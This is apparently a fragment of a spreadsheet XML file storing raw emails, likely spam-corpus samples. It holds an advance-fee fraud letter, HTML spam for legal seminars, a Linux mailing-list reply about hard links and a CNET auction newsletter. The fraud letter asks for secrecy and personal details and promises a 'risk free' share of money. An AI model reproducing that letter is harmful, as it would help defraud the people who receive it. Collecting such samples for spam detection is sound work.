 You must however, NOTE that this transaction will be
 strictly based on the following terms and conditions
 as we have stated below, as we have heard confirmed
 cases of business associates running away with funds
 kept in their custody when it finally arrive their
 accounts. We have decided that this transaction will
 be based completely on the following: 
 (a). Our conviction of your transparent honesty and
 diligence. 
 (b). That you would treat this transaction with utmost
 secrecy and confidentiality. 
 (c). That upon receipt of the funds, you will promptly
 release our share (70%) on demand after you have
 removed your 20% and all expenses have been settled. 
 (d). You must be ready to produce us with enough
 information about yourself to put our minds at rest. 
 Please, note that this transaction is 100% legal and
 risk free and we hope to conclude the business in Ten
 Bank working days from the date of  receipt of the
 necessary information and requirement from you. 
 Endeavour to acknowledge the receipt of this letter
 using my email fax number 1 561 619 2791 or my email
 address mrjoemark@yahoo.com. I will bring you into
 the
 complete picture of the transaction when I have heard
 from you. 
 Your urgent response will be highly appreciated as we
 are already behind schedule for this financial
 quarter. 
 Thank you and God bless. 
 Yours faithfully, 
 Mr Joe Mark
 __________________________________________________
 Do You Yahoo!?
 LAUNCH - Your Yahoo! Music Experience
 http://launch.yahoo.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: MCLE Seminars
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;MCLE Seminars&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000" link="#990033" vlink="#000066" alink="#FF0000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"&gt;
 &lt;table width="600" border="0" cellspacing="0" cellpadding="0"&gt;
   &lt;tr&gt;
     &lt;td align="left" valign="top"&gt; 
 &lt;p align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Click 
             &lt;a href="http://www.askthelawyers.com/apps/remove.asp?email=webmaster@efi.ie"&gt;here&lt;/a&gt; 
             to be removed from our email list.&lt;/font&gt;&lt;/p&gt;
       &lt;table width="600" border="0" cellspacing="0" cellpadding="0"&gt;
         &lt;tr&gt; 
           &lt;td&gt;&lt;img src="http://www.attorneyconnectionsinc.com/email/top.gif" width="600" height="39"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td&gt;&lt;img src="http://www.attorneyconnectionsinc.com/email/bar.gif" width="600" height="75"&gt;&lt;br&gt;
             &lt;img src="http://www.attorneyconnectionsinc.com/email/pic.jpg" width="600" height="126"&gt; 
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;br&gt;
       &lt;table width="600" border="0" cellspacing="0" cellpadding="10"&gt;
         &lt;tr&gt; 
           &lt;td width="300" align="left" valign="top"&gt; 
             &lt;p&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font size="3"&gt;July 
               6-7 , 2002&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font size="3"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;br&gt;
               Cost: &lt;font color="#990000"&gt;$795&lt;font size="1"&gt;*&lt;/font&gt;&lt;/font&gt;&lt;br&gt;
               Held at the HILTON Waikola Village, &lt;/font&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font size="3"&gt;Hawaii&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;font color="#990033"&gt; 
               Register and pay by May 31 and recieve 10% off! ($715.50)&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;font color="#FF0000"&gt;&lt;font color="#333399" size="1"&gt;*&lt;/font&gt;&lt;font color="#333399"&gt;&lt;font size="1"&gt;air, 
               hotel, and activities not included&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;/td&gt;
           &lt;td width="300" align="left" valign="top"&gt; 
             &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#333399" size="2"&gt;&lt;i&gt;&lt;b&gt;&lt;font color="#000000"&gt;&amp;quot;The 
               presentation was extremely informative and entertaining.&amp;quot; &lt;/font&gt;&lt;/b&gt;&lt;/i&gt; 
               &lt;/font&gt; &lt;/p&gt;
             &lt;p&gt;&lt;font size="2" color="#000000" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;i&gt;&lt;b&gt;&amp;quot;Fun 
               for the whole family... A great reason to take a vacation!&amp;quot;&lt;/b&gt;&lt;/i&gt;&lt;/font&gt;&lt;/p&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table width="100%" border="0" cellspacing="0" cellpadding="5"&gt;
         &lt;tr&gt;
           &lt;td height="20"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td valign="middle" align="center" bgcolor="#333399"&gt;&lt;font size="4" face="Verdana, Arial, Helvetica, sans-serif" color="#333399"&gt;&lt;b&gt;&lt;i&gt;&lt;font size="4" face="Verdana, Arial, Helvetica, sans-serif" color="#333399"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#FFFFFF"&gt;&lt;font size="2"&gt;**** 
             &lt;/font&gt;&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;font color="#FFFFFF"&gt;Limited Space Available 
             &lt;font size="2"&gt;****&lt;/font&gt;&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td height="10"&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table width="600" border="0" cellspacing="0" cellpadding="0"&gt;
         &lt;tr&gt;
           &lt;td valign="top" align="left"&gt; 
             &lt;table width="600" border="0" cellspacing="0" cellpadding="10"&gt;
               &lt;tr&gt;
                 &lt;td valign="middle" align="center"&gt; 
                   &lt;table width="100%" border="1" height="71" cellpadding="1" cellspacing="0" bordercolor="#333399"&gt;
                     &lt;tr&gt; 
                       &lt;td width="37" height="16" align="center" valign="middle"&gt;&lt;b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif" color="#990000"&gt;Hours&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;td width="219" height="16" valign="middle"&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif" color="#990000"&gt;&lt;b&gt;&lt;font size="2"&gt;Includes 
                         12.5 hours of participatory:&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt; 
                       &lt;td width="37" align="center" valign="middle"&gt;&lt;b&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif" color="#990000"&gt;6.0&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;td width="219" valign="middle"&gt;&lt;b&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif" color="#990000"&gt; 
                         Ethics&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt; 
                       &lt;td width="37" align="center" valign="middle"&gt;&lt;b&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif" color="#990000"&gt;3.0&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;td width="219" valign="middle"&gt;&lt;b&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif" color="#990000"&gt;Substance 
                         Abuse&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt; 
                       &lt;td width="37" align="center" valign="middle" height="5"&gt;&lt;b&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif" color="#990000"&gt;1.5&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;td width="219" valign="middle" height="5"&gt;&lt;b&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif" color="#990000"&gt;Emotional 
                         Distress&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt; 
                       &lt;td width="37" align="center" height="3" valign="middle"&gt;&lt;b&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif" color="#990000"&gt;1.0&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;td width="219" height="3" valign="middle"&gt;&lt;b&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif" color="#990000"&gt;Elimination 
                         of Bias in the Legal Profession&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr align="center"&gt; 
                       &lt;td width="37" height="2" valign="middle"&gt;&lt;b&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif" color="#990000"&gt;1.0&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;td width="219" height="2" align="left" valign="middle"&gt;&lt;b&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif" color="#990000"&gt;General 
                         Legal Education&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr align="center"&gt; 
                       &lt;td colspan="2" valign="middle"&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif" color="#990000"&gt; 
                         &lt;font size="2"&gt;&lt;b&gt;Audio Materials for remaining MCLE &lt;br&gt;
                         credits will be available at the seminar.&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
                 &lt;td valign="middle" align="center"&gt; 
                   &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#333399"&gt;&lt;b&gt;Brought 
                     to you by:&lt;br&gt;
                     &lt;/b&gt;&lt;/font&gt;&lt;img src="http://www.attorneyconnectionsinc.com/email/logo.gif" width="250" height="117"&gt;&lt;/p&gt;
                   &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;table width="100%" border="0" cellspacing="0" cellpadding="3"&gt;
               &lt;tr&gt; 
                 &lt;td align="left" valign="top"&gt; 
                   &lt;table width="600" border="0" cellspacing="0" cellpadding="5"&gt;
                     &lt;tr&gt;
                       &lt;td align="center" valign="top"&gt; 
                         &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                         &lt;/td&gt;
                       &lt;td align="left" valign="middle"&gt; 
                         &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#333399"&gt;&lt;b&gt;&lt;i&gt;&lt;font size="4"&gt;Bar 
                           Approved Curriculum&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
                         &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Approved 
                           by Arizona, Arkansas, California, Georgia, Idaho, Iowa, 
                           Kansas, Louisiana, Maine, Missouri, Montana, Nevada, 
                           New Hampshire, New Mexico, North Carolina, North Dakota, 
                           Oregon, Pennsylvania, South Carolina, Tennesee, Texas, 
                           Utah, Virginia, Washington State, and Wisconsin Bar 
                           Associations. Approval pending for Alabama and Minnesota.&lt;/font&gt;&lt;/p&gt;
                         &lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;table width="100%" border="1" cellspacing="0" cellpadding="4" bordercolor="#000000"&gt;
               &lt;tr&gt; 
                 &lt;td align="center" valign="middle" bgcolor="#000099"&gt; 
                   &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="3" color="#FFFFFF"&gt;&lt;b&gt;Call 
                     &lt;font size="4"&gt; Attorney Connections&lt;/font&gt; at &lt;font size="4"&gt;(800) 
                     221-8424&lt;/font&gt; &lt;br&gt;
                     to reserve your package today!&lt;/b&gt;&lt;/font&gt; &lt;/p&gt;
                   &lt;p&gt;&lt;font color="#FFFFFF"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;OR: 
                     &lt;/font&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;a href="http://www.attorneyconnectionsinc.com/registration.htm" style="color:gold
 " target="_blank"&gt;Click here to print&lt;/a&gt; the reservation form and fax to &lt;font color="#FFCC99"&gt;(760) 
                     731-7785&lt;/font&gt;; or &lt;br&gt;
                     mail to: Attorney Connections, P.O. Box 1533, Bonsall, CA 
                     92003&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;&lt;img src="http://www.askthelawyers.com/email.asp?email=webmaster@efi.ie&amp;campaign=78" width="1" height="1"&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On July 19, niall@linux.ie said:
 &gt; 
 &gt; There are lots of benefits to using hard links, for all sorts of reasons. In
 "...but there is insufficient room in the margin of this email to
  describe them..." :)
 &gt; this case, they are being used to provide two quite different namespaces
 &gt; for the same set of files.
 Sure, but soft links would do the same. To be honest, I'm trying to
 think of a useful use of hard links right now, and I'm a little
 stumped. There's gotta be some benefit that I'm missing that's
 immediately obvious to everyone.
 Cheers,
 Waider.
 -- 
 waider@waider.ie / Yes, it /is/ very personal of me.
 merde says, "in other news, our mini-blimp blew away."
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Intel 900MHz / 256MB PC-133 / 10X DVD / 20GB PC: Starting Bid $229
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Auctions Weekly Newsletter&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee" alink=#0000FF vlink=#0000FF&gt;
 &lt;center&gt;
 &lt;a name="top"&gt;&lt;/a&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 &lt;tr valign=top&gt;&lt;td width=442 colspan=4&gt;&lt;a href="http://clickthru.online.com/Click?q=6b-8g5ZIHEcwpuSOqD80ywQ-4d0P6lR" &gt;
 &lt;img src="http://www.cnet.com/i/nl/au/hd.gif" width=442 height=60
 alt="Auctions Weekly Newsletter" border=0&gt;&lt;/a&gt;&lt;br&gt;
 &lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#ffcc00"&gt;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&lt;table cellpadding=0 cellspacing=0 border=0 width=160&gt;
 &lt;tr&gt;&lt;td align=center bgcolor="#eeeeee"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;!-- bottom right column --&gt;        
 &lt;!-- search form --&gt;
 &lt;table cellspacing=0 cellpadding=0 width=150 border=0&gt;&lt;form method=get
 action="http://www.search.com/redirect"&gt;
 &lt;tr valign=top&gt;&lt;td&gt;&lt;font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value="http://auctions.cnet.com/cgi-bin/search/search?ss=%%q%%&amp;loc=auc"&gt;
 Auctions
  &lt;option
 value="http://cnet.search.com/search?tag=ex.auctions.dispatch.srch.cnet"
 &gt;All CNET
  &lt;option
 value="http://www.search.com/search?tag=ex.auctions.dispatch.srch.web"&gt;T
 he Web
 &lt;/select&gt;&amp;nbsp;&lt;input type=submit
 value="Go!"&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/form&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- /search form --&gt;
 &lt;table width=160 bgcolor="#ffffef" cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td colspan=5 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif"
 width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif"
 width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=6&gt;&lt;img src="http://www.cnet.com/b.gif" width=6 height=1&gt;&lt;/td&gt;
 &lt;td width=149&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;img
 src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;br&gt;
 &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=80-KTKvQQ0KirSTTVOoaDkjVsTLZ89R" &gt;Site
 Map&lt;/a&gt;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;&lt;a
 href="http://auctions.cnet.com/cgi-bin/dp?117"&gt;Desktops&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;&lt;a
 href="http://auctions.cnet.com/cgi-bin/dp?118"&gt;Notebooks&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;&lt;a
 href="http://auctions.cnet.com/cgi-bin/dp?264"&gt;Components&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;&lt;a
 href="http://auctions.cnet.com/cgi-bin/dp?270"&gt;Software&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;&lt;a
 href="http://auctions.cnet.com/cgi-bin/dp?316"&gt;Input Devices&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;&lt;a
 href="http://auctions.cnet.com/cgi-bin/dp?304"&gt;Networking&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;&lt;a
 href="http://auctions.cnet.com/cgi-bin/dp?251"&gt;Handhelds&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;&lt;a
 href="http://auctions.cnet.com/cgi-bin/dp?280"&gt;Printers&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;&lt;a
 href="http://auctions.cnet.com/cgi-bin/dp?252"&gt;Memory&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;&lt;a
 href="http://auctions.cnet.com/cgi-bin/dp?285"&gt;Storage&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;&lt;a
 href="http://auctions.cnet.com/cgi-bin/dp?340"&gt;Electronics&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;&lt;a
 href="http://auctions.cnet.com/cgi-bin/dp?257"&gt;Monitors&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;&lt;a
 href="http://auctions.cnet.com/cgi-bin/dp?291"&gt;Modems&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;&lt;a
 href="http://auctions.cnet.com/cgi-bin/dp?300"&gt;Scanners&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;&lt;a
 href="http://auctions.cnet.com/cgi-bin/dp?331"&gt;Services&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;&lt;a
 href="http://auctions.cnet.com/cgi-bin/dp?296"&gt;Digital Cameras&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;&lt;a
 href="http://auctions.cnet.com/cgi-bin/dp?324"&gt;Accessories&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;&lt;a
 href="http://auctions.cnet.com/cgi-bin/dp?334"&gt;Multimedia&lt;/a&gt;&lt;br&gt;
 &lt;/b&gt;&lt;/font&gt;&lt;img src="http://www.cnet.com/b.gif" width=149
 height=10&gt;&lt;/td&gt;
 &lt;td width=3&gt;&lt;img src="http://www.cnet.com/b.gif" width=3 height=1&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif"
 width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=5 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif"
 width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /bottom right column --&gt;
 &lt;P&gt;&lt;/P&gt;&lt;/TD&gt;
 &lt;TD width=9 rowSpan=2&gt;&lt;IMG height=60
 src="http://www.cnet.com/i/nl/dd_c.gif" 
 width=9&gt;&lt;BR&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=9 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#000000&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif" 
 width=9&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#ffcc00&gt;&lt;IMG height=10 src="http://www.cnet.com/b.gif" 
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#000000&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif" 
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
 &lt;TD width=1 bgColor=#000000 rowSpan=2&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=1 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#eeeeee&gt;&lt;IMG height=60 src="http://www.cnet.com/b.gif" 
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR vAlign=top&gt;
 &lt;TD width=1 bgColor=#000000&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" 
 width=1&gt;&lt;/TD&gt;
 &lt;TD width=10 bgColor=#ffcc00&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" 
 width=10&gt;&lt;/TD&gt;
 &lt;TD width=1 bgColor=#000000&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" 
 width=1&gt;&lt;/TD&gt;
 &lt;TD width=430 bgColor=#ffffff&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=430 bgColor=#EEEEEE border=0
 bordercolor="#EEEEEE"&gt;
 &lt;TBODY&gt;
 &lt;tr&gt;
 &lt;td width="100%" colspan="3" align=bottom&gt;
 &lt;font face="arial, helvetica" size="-2" color="#000000"&gt;
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;b&gt;July 11th, 2002&lt;/b&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;TR vAlign=top&gt;
 &lt;TD width=10&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif"
 width=10&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;IMG height=8 src="http://www.cnet.com/b.gif" width=1&gt;
 &lt;div align="center"&gt;
 &lt;table border="1" cellspacing="1" bordercolor="#FFCC00" width="100%"
 bgcolor="#FFFFFF"&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;div align="center"&gt;
 &lt;table border="0" cellspacing="0" width="100%"&gt;
 &lt;tr&gt;
 &lt;td width="100%" colspan="2"&gt;&lt;br&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;u&gt;&lt;font face="Arial" color="#0000FF" size="3"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdJorWvte2r1yZeU_u_KnuR" &gt;
 Intel 900MHz / 256MB PC-133 / 10X DVD / 20GB PC&lt;/font&gt;&lt;/a&gt;&lt;/u&gt;
 &lt;font face="Arial" size="2" color="#0000FF"&gt;&amp;nbsp;&lt;/font&gt;&lt;/b&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="65%" valign="top" align="left"&gt;
 &lt;br&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;b&gt;&lt;font face="Arial" size="2"&gt;&lt;font color="#CC0000"&gt;&lt;u&gt;Intel&lt;/u&gt;&lt;/font&gt; 900MHz Socket 370 Processor&lt;/font&gt;&lt;/b&gt;&lt;/li&gt;
 &lt;li&gt;&lt;b&gt;&lt;font face="Arial" size="2"&gt;&lt;font color="#CC0000"&gt;&lt;u&gt;Microstar&lt;/u&gt;&lt;/font&gt; PIII ATX Motherboard&lt;/font&gt;&lt;/b&gt;&lt;/li&gt;
 &lt;li&gt;&lt;b&gt;&lt;font face="Arial" size="2"&gt;&lt;font color="#CC0000"&gt;&lt;u&gt;Micron&lt;/u&gt;&lt;/font&gt; 256MB PC-133 SDRAM&lt;/font&gt;&lt;/b&gt;&lt;/li&gt;
 &lt;li&gt;&lt;b&gt;&lt;font face="Arial" size="2"&gt;&lt;font color="#CC0000"&gt;&lt;u&gt;Pioneer&lt;/u&gt;&lt;/font&gt; 10X DVD-ROM&lt;/font&gt;&lt;/b&gt;&lt;/li&gt;
 &lt;li&gt;&lt;b&gt;&lt;font face="Arial" size="2"&gt;8MB 2X AGP Video&lt;/font&gt;&lt;/b&gt;&lt;/li&gt;
 &lt;li&gt;&lt;b&gt;&lt;font face="Arial" size="2"&gt;64-Bit PCI Sound Card&lt;/font&gt;&lt;/b&gt;&lt;/li&gt;
 &lt;li&gt;&lt;b&gt;&lt;font face="Arial" size="2"&gt;&lt;font color="#CC0000"&gt;&lt;u&gt;WD/Seagate&lt;/u&gt;&lt;/font&gt; 20GB Ultra-66 HDD&lt;/font&gt;&lt;/b&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;/td&gt;
 &lt;td width="35%"&gt;
 &lt;div align="center"&gt;
 &lt;table border="0" cellspacing="0" cellpadding="0"&gt;
 &lt;tr&gt;
 &lt;td width="100%" valign="center"&gt;&lt;center&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ab-ZcQKQYpdYiQ0ewrXydit0M-0OvFR" &gt;
 &lt;img border="0"
 src="http://auctions.cnet.com/images/dispatch/desktop2_dispatch.gif"&gt;
 &lt;/a&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/div&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="100%" colspan="2" align="center"&gt;
 &lt;font color="#CC0000" face="Arial"&gt;&lt;b&gt;
 Bidding starts at &lt;font size=6&gt; $229&amp;nbsp;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;&lt;td width="100%" colspan="2"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="100%" colspan="2" align="center"&gt;&lt;b&gt;&lt;font face="Arial"
 color="#0000FF"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c0-kfs-QWP2ztd-XSC41H99K8FZuS9R" &gt;
 &lt;u&gt;Don't miss out, place your bid now!&lt;/u&gt;&lt;/font&gt;&lt;/b&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/div&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/div&gt;
 &lt;p&gt;&lt;IMG height=4 src="http://www.cnet.com/b.gif" width=1&gt;&lt;BR&gt;
 &lt;IMG height=1 src="http://www.cnet.com/b.gif" width=8&gt;&lt;/TD&gt;
 &lt;TD width=8&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif" 
 width=8&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=430 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#ffcc00&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif" 
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt; &lt;BR&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;
 &lt;DIV style="MARGIN-LEFT: 10px; MARGIN-RIGHT: 10px"&gt;
 &lt;!-- main content --&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d5-p-viQzL1as2qbobHCu4jNix1DPuR" &gt;
 &lt;img src="http://www.cnet.com/i/nl/au/sub_hot.gif"
 width=310 height=19 border=0&gt;&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width=410 height=8&gt;&lt;br&gt;
